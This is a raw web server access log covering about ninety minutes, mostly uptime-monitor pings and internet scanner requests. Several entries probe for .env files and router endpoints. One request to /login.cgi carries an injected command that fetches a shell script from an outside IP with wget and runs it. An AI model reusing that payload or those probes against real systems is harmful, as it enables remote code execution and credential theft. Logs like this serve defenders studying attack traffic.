212.91.246.72 - - [03/Oct/2024:16:52:00 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2024:16:53:00 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2024:16:54:00 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2024:16:55:01 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
77.90.22.72 - - [03/Oct/2024:16:55:06 +0200] "GET /cgi-bin/index.cgi HTTP/1.1" 404 322 "-" "-"
185.191.126.213 - - [03/Oct/2024:16:55:39 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
35.195.93.5 - - [03/Oct/2024:16:55:47 +0200] "GET / HTTP/1.1" 200 1229 "-" "python-requests/2.32.3"
212.91.246.72 - - [03/Oct/2024:16:56:01 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
34.34.132.221 - - [03/Oct/2024:16:56:06 +0200] "GET / HTTP/1.1" 200 1229 "-" "python-requests/2.32.3"
212.91.246.72 - - [03/Oct/2024:16:57:01 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
45.156.129.56 - - [03/Oct/2024:16:57:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
212.91.246.72 - - [03/Oct/2024:16:58:01 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
141.98.11.79 - - [03/Oct/2024:16:58:59 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [03/Oct/2024:16:59:01 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
119.237.141.234 - - [03/Oct/2024:17:00:01 +0200] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (Linux; U; Android 4.0.3; ko-kr; LG-L160L Build/IML74K) AppleWebkit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30"
212.91.246.72 - - [03/Oct/2024:17:00:02 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2024:17:01:02 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
149.50.103.48 - - [03/Oct/2024:17:01:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [03/Oct/2024:17:02:02 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
141.98.11.79 - - [03/Oct/2024:17:02:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [03/Oct/2024:17:03:02 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.191.126.213 - - [03/Oct/2024:17:03:22 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [03/Oct/2024:17:04:02 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2024:17:05:02 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2024:17:06:03 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
149.50.103.48 - - [03/Oct/2024:17:06:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [03/Oct/2024:17:07:02 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2024:17:08:02 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2024:17:09:02 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2024:17:10:02 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2024:17:11:02 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.191.126.213 - - [03/Oct/2024:17:11:12 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
185.191.126.213 - - [03/Oct/2024:17:11:37 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [03/Oct/2024:17:12:03 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
92.118.39.167 - - [03/Oct/2024:17:12:38 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
92.118.39.167 - - [03/Oct/2024:17:12:47 +0200] "POST / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
212.91.246.72 - - [03/Oct/2024:17:13:03 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2024:17:14:03 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2024:17:15:03 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
149.50.103.48 - - [03/Oct/2024:17:15:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [03/Oct/2024:17:16:03 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2024:17:17:03 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.191.126.213 - - [03/Oct/2024:17:18:02 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [03/Oct/2024:17:18:03 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2024:17:19:03 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
80.82.77.202 - - [03/Oct/2024:17:19:30 +0200] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (X11; U; SunOS i86pc; en-US; rv:1.8.1.12) Gecko/20080303 SeaMonkey/1.1.8"
149.50.103.48 - - [03/Oct/2024:17:19:45 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [03/Oct/2024:17:20:04 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
80.82.77.202 - - [03/Oct/2024:17:20:09 +0200] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (X11; U; SunOS i86pc; en-US; rv:1.8.1.12) Gecko/20080303 SeaMonkey/1.1.8"
77.90.22.72 - - [03/Oct/2024:17:21:02 +0200] "GET /cgi-bin/index.cgi HTTP/1.1" 404 322 "-" "-"
212.91.246.72 - - [03/Oct/2024:17:21:04 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2024:17:22:04 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2024:17:23:04 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2024:17:24:04 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
167.94.146.63 - - [03/Oct/2024:17:24:26 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
167.94.146.63 - - [03/Oct/2024:17:24:29 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.146.63 - - [03/Oct/2024:17:24:30 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.146.63 - - [03/Oct/2024:17:24:30 +0200] "PRI * HTTP/2.0" 400 329 "-" "-"
212.91.246.72 - - [03/Oct/2024:17:25:04 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2024:17:26:04 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
149.50.103.48 - - [03/Oct/2024:17:26:47 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
77.90.22.72 - - [03/Oct/2024:17:27:02 +0200] "GET /cgi-bin/index.cgi HTTP/1.1" 404 322 "-" "-"
212.91.246.72 - - [03/Oct/2024:17:27:05 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2024:17:28:05 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2024:17:29:05 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2024:17:30:05 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
77.90.22.72 - - [03/Oct/2024:17:30:14 +0200] "GET /cgi-bin/index.cgi HTTP/1.1" 404 322 "-" "-"
212.91.246.72 - - [03/Oct/2024:17:31:05 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.191.126.213 - - [03/Oct/2024:17:31:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [03/Oct/2024:17:32:05 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2024:17:33:06 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2024:17:34:06 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2024:17:35:06 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
149.50.103.48 - - [03/Oct/2024:17:35:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [03/Oct/2024:17:36:06 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2024:17:37:06 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
149.50.103.48 - - [03/Oct/2024:17:37:39 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [03/Oct/2024:17:38:06 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
220.100.86.29 - - [03/Oct/2024:17:38:33 +0200] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (Linux; U; Android 4.0.3; ko-kr; LG-L160L Build/IML74K) AppleWebkit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30"
212.91.246.72 - - [03/Oct/2024:17:39:06 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
92.118.39.167 - - [03/Oct/2024:17:39:31 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
92.118.39.167 - - [03/Oct/2024:17:39:35 +0200] "POST / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
212.91.246.72 - - [03/Oct/2024:17:40:06 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
77.90.22.72 - - [03/Oct/2024:17:40:31 +0200] "GET /command_port.ini HTTP/1.1" 404 321 "-" "-"
185.191.126.213 - - [03/Oct/2024:17:40:59 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [03/Oct/2024:17:41:06 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2024:17:42:07 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
77.90.22.72 - - [03/Oct/2024:17:42:26 +0200] "GET /command_port.ini HTTP/1.1" 404 321 "-" "-"
212.91.246.72 - - [03/Oct/2024:17:43:07 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2024:17:44:07 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2024:17:45:07 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2024:17:46:07 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2024:17:47:07 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2024:17:48:07 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2024:17:49:07 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2024:17:50:07 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2024:17:51:08 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
149.50.103.48 - - [03/Oct/2024:17:51:21 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
203.55.131.4 - - [03/Oct/2024:17:51:23 +0200] "\x16\x03\x01" 501 318 "-" "-"
212.91.246.72 - - [03/Oct/2024:17:52:08 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2024:17:53:08 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2024:17:54:08 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
80.82.77.202 - - [03/Oct/2024:17:54:17 +0200] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (X11; U; SunOS i86pc; en-US; rv:1.8.1.12) Gecko/20080303 SeaMonkey/1.1.8"
212.91.246.72 - - [03/Oct/2024:17:55:08 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
80.82.77.202 - - [03/Oct/2024:17:55:48 +0200] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (X11; U; SunOS i86pc; en-US; rv:1.8.1.12) Gecko/20080303 SeaMonkey/1.1.8"
212.91.246.72 - - [03/Oct/2024:17:56:09 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
199.45.154.129 - - [03/Oct/2024:17:56:32 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
199.45.154.129 - - [03/Oct/2024:17:56:37 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
199.45.154.129 - - [03/Oct/2024:17:56:39 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
199.45.154.129 - - [03/Oct/2024:17:56:40 +0200] "PRI * HTTP/2.0" 400 329 "-" "-"
37.139.5.66 - - [03/Oct/2024:17:56:50 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://193.35.18.164/klausschwab.sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 329 "-" "linus-torvalds-loves-you"
212.91.246.72 - - [03/Oct/2024:17:57:09 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2024:17:58:09 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.191.126.213 - - [03/Oct/2024:17:58:56 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [03/Oct/2024:17:59:09 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.191.126.213 - - [03/Oct/2024:18:00:03 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [03/Oct/2024:18:00:09 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
77.90.22.72 - - [03/Oct/2024:18:00:24 +0200] "GET /command_port.ini HTTP/1.1" 404 321 "-" "-"
212.91.246.72 - - [03/Oct/2024:18:01:09 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.191.126.213 - - [03/Oct/2024:18:01:30 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [03/Oct/2024:18:02:10 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
159.196.117.218 - - [03/Oct/2024:18:02:22 +0200] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (Linux; U; Android 4.0.3; ko-kr; LG-L160L Build/IML74K) AppleWebkit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30"
154.213.187.244 - - [03/Oct/2024:18:02:51 +0200] "CONNECT google.com:443 HTTP/1.1" 405 340 "-" "Go-http-client/1.1"
212.91.246.72 - - [03/Oct/2024:18:03:10 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
80.82.77.202 - - [03/Oct/2024:18:03:27 +0200] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (X11; U; SunOS i86pc; en-US; rv:1.8.1.12) Gecko/20080303 SeaMonkey/1.1.8"
80.82.77.202 - - [03/Oct/2024:18:04:00 +0200] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (X11; U; SunOS i86pc; en-US; rv:1.8.1.12) Gecko/20080303 SeaMonkey/1.1.8"
212.91.246.72 - - [03/Oct/2024:18:04:10 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
80.82.77.202 - - [03/Oct/2024:18:04:46 +0200] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (X11; U; SunOS i86pc; en-US; rv:1.8.1.12) Gecko/20080303 SeaMonkey/1.1.8"
185.191.126.213 - - [03/Oct/2024:18:05:07 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [03/Oct/2024:18:05:10 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
80.82.77.202 - - [03/Oct/2024:18:05:39 +0200] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (X11; U; SunOS i86pc; en-US; rv:1.8.1.12) Gecko/20080303 SeaMonkey/1.1.8"
80.82.77.202 - - [03/Oct/2024:18:05:51 +0200] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (X11; U; SunOS i86pc; en-US; rv:1.8.1.12) Gecko/20080303 SeaMonkey/1.1.8"
212.91.246.72 - - [03/Oct/2024:18:06:10 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
80.82.77.202 - - [03/Oct/2024:18:06:12 +0200] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (X11; U; SunOS i86pc; en-US; rv:1.8.1.12) Gecko/20080303 SeaMonkey/1.1.8"
212.91.246.72 - - [03/Oct/2024:18:07:10 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2024:18:08:11 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
203.55.131.4 - - [03/Oct/2024:18:08:21 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.0.0 Safari/537.36"
212.91.246.72 - - [03/Oct/2024:18:09:11 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
203.55.131.4 - - [03/Oct/2024:18:09:29 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.0.0 Safari/537.36"
185.191.126.213 - - [03/Oct/2024:18:09:48 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [03/Oct/2024:18:10:11 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2024:18:11:11 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
141.98.11.79 - - [03/Oct/2024:18:11:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [03/Oct/2024:18:12:11 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2024:18:13:11 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2024:18:14:11 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2024:18:15:11 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2024:18:16:12 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2024:18:17:12 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
141.98.11.79 - - [03/Oct/2024:18:17:40 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [03/Oct/2024:18:18:12 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
194.165.16.72 - - [03/Oct/2024:18:18:56 +0200] "\x03" 501 316 "-" "-"
212.91.246.72 - - [03/Oct/2024:18:19:12 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2024:18:20:12 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2024:18:21:12 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2024:18:22:13 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.191.126.213 - - [03/Oct/2024:18:22:36 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [03/Oct/2024:18:23:13 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2024:18:24:13 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2024:18:25:13 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2024:18:26:13 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2024:18:27:13 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2024:18:28:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
141.98.11.79 - - [03/Oct/2024:18:28:27 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
178.211.139.188 - - [03/Oct/2024:18:28:53 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
212.91.246.72 - - [03/Oct/2024:18:29:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.224.128.59 - - [03/Oct/2024:18:29:22 +0200] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 331 "-" "-"
212.91.246.72 - - [03/Oct/2024:18:30:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
149.50.103.48 - - [03/Oct/2024:18:30:49 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [03/Oct/2024:18:31:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
